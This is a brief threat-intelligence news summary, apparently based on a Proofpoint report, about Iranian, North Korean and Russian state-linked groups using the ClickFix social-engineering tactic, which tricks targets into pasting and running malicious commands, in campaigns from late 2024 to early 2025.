From late 2024 through early 2025, several nation-state hacking groups, including those from Iran, North Korea, and Russia, utilized the ClickFix social engineering tactic to deploy malware. This approach was primarily seen in campaigns attributed to clusters TA427, TA450, and TA422, traditionally associated with cybercrime. Though ClickFix has roots in cybercrime, its increasing effectiveness has led to widespread adoption among state-sponsored actors. Proofpoint reported on the method's deployment, noting that it replaces existing stages in malware infection chains rather than transforming them significantly.
ClickFix is not revolutionizing the campaigns carried out by TA427, TA450, UNK_RemoteRogue, and TA422 but instead is replacing the installation and execution stages in existing infection chains.
TA427 made initial contact with the target through a meeting request from a spoofed sender delivered to traditional TA427 targets working on North Korean affairs.
The incorporation of ClickFix urges users to infect their own machine by following a series of instructions to copy, paste, and run malicious commands.
Proofpoint detected Kimsuky using ClickFix as part of a phishing campaign that targeted individuals in the think tank sector.
Collection
[
|
...
]